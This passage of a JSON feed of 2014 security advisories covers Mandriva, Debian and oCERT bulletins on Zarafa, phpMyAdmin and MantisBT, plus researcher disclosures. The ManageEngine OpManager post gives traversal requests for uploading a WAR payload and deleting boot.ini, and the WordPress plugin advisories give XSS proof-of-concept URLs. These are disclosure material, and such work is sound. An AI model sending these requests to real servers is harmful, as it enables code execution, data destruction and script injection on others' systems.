This session file would contain a user's username and password\r\n to the Zarafa IMAP server (CVE-2014-0103).\r\n \r\n Robert Scheck discovered that the Zarafa Collaboration Platform has\r\n multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448,\r\n CVE-2014-5449, CVE-2014-5450).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0103\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5448\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5449\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5450\r\n http://advisories.mageia.org/MGASA-2014-0380.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 
_______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUIs4hmqjQ0CJFipgRAvRCAJ4wDpxAVuBlFOSSzqskGMG6pKHOzACcDNzl\r\n52oiDTAmeLxW4yTgFVIANrM=\r\n=/D7b\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31201", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31201", "title": "[ MDVSA-2014:182 ] zarafa", "type": "securityvulns", "cvss": {"score": 2.1, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:143\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : July 30, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in\r\n phpmyadmin:\r\n \r\n Cross-site scripting (XSS) vulnerability in the\r\n PMA_getHtmlForActionLinks function in libraries/structure.lib.php in\r\n phpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to\r\n inject arbitrary web script or HTML via a crafted table comment that\r\n is improperly handled during construction of a database structure page\r\n (CVE-2014-4954).\r\n \r\n Cross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList\r\n function in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before\r\n 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote\r\n authenticated users to inject arbitrary web script or HTML via a\r\n crafted trigger name that is improperly handled on the database\r\n triggers page (CVE-2014-4955).\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js\r\n in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x\r\n before 4.2.6 allow remote authenticated users to inject arbitrary web\r\n script or HTML via a crafted (1) table name or (2) column name that is\r\n improperly handled during construction of an AJAX confirmation message\r\n (CVE-2014-4986).\r\n \r\n server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x\r\n before 4.2.6 allows remote authenticated users 
to bypass intended\r\n access restrictions and read the MySQL user list via a viewUsers\r\n request (CVE-2014-4987).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.6) to address\r\n these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4954\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4955\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4986\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4987\r\n http://sourceforge.net/p/phpmyadmin/news/\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n c38d242b5ef43c67383c413ee264c7ee mbs1/x86_64/phpmyadmin-4.2.6-1.mbs1.noarch.rpm \r\n 791e5933c8a096bfff2afa12bf3cd6a5 mbs1/SRPMS/phpmyadmin-4.2.6-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFT2LsEmqjQ0CJFipgRAuZEAJ9i3hrsGpz9nUuG3Cb1kdOrx5nU1gCg2z8e\r\n8mLBij7tNkEf/x0VnnkTFGo=\r\n=tSKY\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:143 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31182", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31182", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\nHi,\r\n\r\nThis is the fifth part of the ManageOwnage series. For previous parts, see:\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\n\r\nThis time we have a file upload with directory traversal as well as an\r\narbitrary file deletion vulnerability. 
The file upload can be abused\r\nto deliver a WAR payload in the Tomcat webapps directory, which will\r\ndeploy a malicious Servlet allowing the attacker to execute arbitrary\r\ncode.\r\n\r\nDetails are below, and the usual Metasploit module has been submitted\r\nand should be available soon (see pull request\r\nhttps://github.com/rapid7/metasploit-framework/pull/3903).\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. 
With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;\r\nIT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360\r\nv? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager\r\nversion 11.4 might not have the fix as the release is almost ready.\r\nThey are planning to include the fix in OpManager version 11.5 which\r\nshould be released sometime in late November or December 2014. 
No\r\nindication was given for when fixed versions of IT360 and Social IT\r\nPlus will be released.\r\n\r\nA copy of the advisory above can be found at my repo:\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\nRegards,\r\nPedro\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31197", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31197", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3030-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nSeptember 20, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mantis\r\nCVE ID : CVE-2014-1608 CVE-2014-1609\r\n\r\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\r\nbug tracking system.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.2.11-1.2+deb7u1.\r\n\r\nWe recommend that you upgrade your mantis packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG 
v1\r\n\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[SECURITY] [DSA 3030-1] mantis security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31210", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31210", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n\r\n#2014-001 MantisBT input sanitization errors\r\n\r\nDescription:\r\n\r\nThe MantisBT web-based bugtracking system suffers from SQL injection\r\nvulnerabilities caused by insufficient input sanitization.\r\n\r\nThe MantisBT SOAP API uses the unsafe db_query() function allowing a\r\nspecially crafted tag within the envelope of a mc_issue_attachment_get SOAP\r\nrequest to inject arbitrary SQL queries.\r\n\r\nThe reporting of this specific issue was followed by an investigation that\r\nlead to additional cases of unsafe db_query() function use, being found by\r\nMantisBT maintainers, throughout MantisBT code.\r\n\r\nAffected 
version:\r\n\r\nMantisBT >= 1.1.0a4, <= 1.2.15\r\n\r\nFixed version:\r\n\r\nMantisBT >= 1.2.16\r\n\r\nCredit: vulnerability report received from Martin Herfurt <martin.herfurt AT\r\nnruns.com>.\r\n\r\nCVE: CVE-2014-1608 (SOAP), CVE-2014-1609 (additional SQL injections)\r\n\r\nTimeline:\r\n\r\n2014-01-17: vulnerability report received\r\n2014-01-17: contacted MantisBT maintainer\r\n2014-01-17: maintainer provides patch for review\r\n2014-01-18: contacted affected vendors\r\n2014-01-19: assigned CVEs\r\n2014-02-08: MantisBT 1.2.16 released\r\n2014-02-08: advisory release\r\n\r\nReferences:\r\nhttp://www.mantisbt.org\r\nhttp://www.mantisbt.org/bugs/view.php?id=16879\r\nhttp://www.mantisbt.org/bugs/view.php?id=16880\r\nhttp://github.com/mantisbt/mantisbt/commit/00b4c17088fa56594d85fe46b6c6057bb3421102\r\nhttp://github.com/mantisbt/mantisbt/commit/7efe0175f0853e18ebfacedfd2374c4179028b3f\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2014-001.html\r\n\r\n-- Andrea Barisani | Founder & Project Coordinator oCERT | OSS Computer Security Incident Response Team <lcars@ocert.org> http://www.ocert.org 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E "Pluralitas non est ponenda sine necessitate"\r\n", "edition": 1, "cvss3": {}, "published": "2014-02-11T00:00:00", "title": "[oCERT-2014-001] MantisBT input sanitization errors", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-02-11T00:00:00", "id": "SECURITYVULNS:DOC:30305", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30305", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:164\r\n 
http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : September 2, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated phpmyadmin package fixes security vulnerabilities:\r\n \r\n In phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in\r\n browse table, ENUM editor, monitor, query charts and table relations\r\n pages (CVE-2014-5273).\r\n \r\n In phpMyAdmin before 4.1.14.3, with a crafted view name it is possible\r\n to trigger an XSS when dropping the view in view operation page\r\n (CVE-2014-5274).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5273\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5274\r\n http://advisories.mageia.org/MGASA-2014-0344.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 34a7b3fb7ca2ba11ed81c8371654783b mbs1/x86_64/phpmyadmin-4.2.8-1.mbs1.noarch.rpm \r\n d1e257a0a057e471cea8142b7abe7b5b mbs1/SRPMS/phpmyadmin-4.2.8-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUBa03mqjQ0CJFipgRAiQNAKDvpJ3eEz3iBPVWBmy3u8owfHnHVQCfT+He\r\nIeSBTdAtN/fXKAuchCOhl8A=\r\n=R82I\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:164 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31183", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31183", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:126\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : July 8, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in\r\n phpmyadmin:\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.2.x\r\n before 4.2.4 
allow remote authenticated users to inject arbitrary web\r\n script or HTML via a crafted (1) database name or (2) table name that\r\n is improperly handled after presence in (a) the favorite list or (b)\r\n recent tables (CVE-2014-4348).\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x\r\n before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated\r\n users to inject arbitrary web script or HTML via a crafted table\r\n name that is improperly handled after a (1) hide or (2) unhide action\r\n (CVE-2014-4349).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.5) to address\r\n these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4348\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4349\r\n http://sourceforge.net/p/phpmyadmin/news/\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 94dcec5bc68487ebb9e27567f290257d mbs1/x86_64/phpmyadmin-4.2.5-1.mbs1.noarch.rpm \r\n e4603acd4aaabb0127bdd9cb763d1bc5 mbs1/SRPMS/phpmyadmin-4.2.5-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTu/comqjQ0CJFipgRAkBsAKCH0tOH//7fgAqzbWgcP9SZeiql7wCdEiXC\r\n3BWL3Jy4l4Ty9S/6mF9RjAU=\r\n=BTEz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:126 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31181", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31181", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7138"], "description": "\r\n\r\nAdvisory ID: HTB23235\r\nProduct: Google Calendar Events WordPress plugin\r\nVendor: Phil Derksen\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: October 7, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7138\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138\r\n\r\nInput passed via the "gce_feed_ids" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Google Calendar Events 2.0.4\r\n\r\nMore Information:\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23235 - https://www.htbridge.com/advisory/HTB23235 - Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin.\r\n[2] Google Calendar Events WordPress plugin - http://philderksen.com/ - Parses Google Calendar feeds and displays the events as a calendar grid or list on a page, post 
or widget.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31164", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31164", "title": "Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4958"], "description": "\r\n\r\nAll versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting (XSS) vulnerability that is assigned CVE-2014-4958. 
This WYSIWYG rich text editor is \u201c...what Microsoft chose to use in MSDN, CodePlex, TechNet, MCMS and even as an alternative to the default editor in SharePoint.\u201d\r\n\r\nPersonally tested and confirmed are versions: 2014.1.403.35 (much newer) and 2009.3.1208.20 (much older) using Internet Explorer 8, version 8.0.7601.17514. However, all versions from Telerik at this time may be vulnerable and will continue to be until a patch is released. A workaround may be available.\r\n\r\nMore information on the vulnerability: http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/\r\n\r\nRemediation: Telerik states: We have applied a patch to the editor that will be delivered with our Q3 edition of the controls that should be released towards the end of October. A blog post on the issue has been published here: http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks\r\n\r\nAdditional credit goes to Tyler Hoyle and the rest of my team in CGI Federal\u2019s Emerging Technologies Security Practice for their hard work.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31198", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31198", "title": "CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7139"], "description": "\r\n\r\nAdvisory ID: HTB23233\r\nProduct: Contact Form DB WordPress plugin\r\nVendor: Michael Simpson\r\nVulnerable Version(s): 2.8.13 and probably prior\r\nTested Version: 2.8.13\r\nAdvisory Publication: September 17, 2014 [without technical 
details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 25, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7139\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed.\r\n\r\n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139\r\n\r\n1.1 Input passed via the "form" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n1.2 Input passed via the "enc" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. 
